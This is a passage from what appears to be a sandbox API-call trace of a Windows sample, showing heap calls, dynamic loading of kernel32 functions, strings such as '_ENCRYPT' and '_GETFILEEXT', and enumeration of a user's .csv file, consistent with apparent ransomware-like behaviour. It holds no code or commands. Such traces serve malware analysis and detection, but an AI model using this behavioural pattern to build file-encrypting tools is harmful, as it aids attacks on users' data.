wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0179.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0179.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0179.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0179.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0179.659] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0179.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0179.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0179.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0179.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.660] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0179.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd390, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0179.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.661] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0179.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0179.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0179.661] CloseHandle (hObject=0x120) returned 1 [0179.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0179.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.662] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0179.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.663] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0179.663] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.663] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0179.663] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.663] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0179.663] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0179.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.663] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.663] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.663] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.663] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x658e8210, ftCreationTime.dwHighDateTime=0x1d5e481, ftLastAccessTime.dwLowDateTime=0x5efc4c10, ftLastAccessTime.dwHighDateTime=0x1d5dba4, ftLastWriteTime.dwLowDateTime=0x5efc4c10, ftLastWriteTime.dwHighDateTime=0x1d5dba4, nFileSizeHigh=0x0, nFileSizeLow=0xb478, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RDv9Bzzuy Is9HIraE.csv", cAlternateFileName="RDV9BZ~1.CSV")) returned 0x90add8 [0179.665] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.665] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.665] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x658e8210, ftCreationTime.dwHighDateTime=0x1d5e481, ftLastAccessTime.dwLowDateTime=0x5efc4c10, ftLastAccessTime.dwHighDateTime=0x1d5dba4, ftLastWriteTime.dwLowDateTime=0x5efc4c10, ftLastWriteTime.dwHighDateTime=0x1d5dba4, nFileSizeHigh=0x0, nFileSizeLow=0xb478, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RDv9Bzzuy Is9HIraE.csv", cAlternateFileName="RDV9BZ~1.CSV")) returned 0x90add8 [0179.666] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.666] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dv9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, 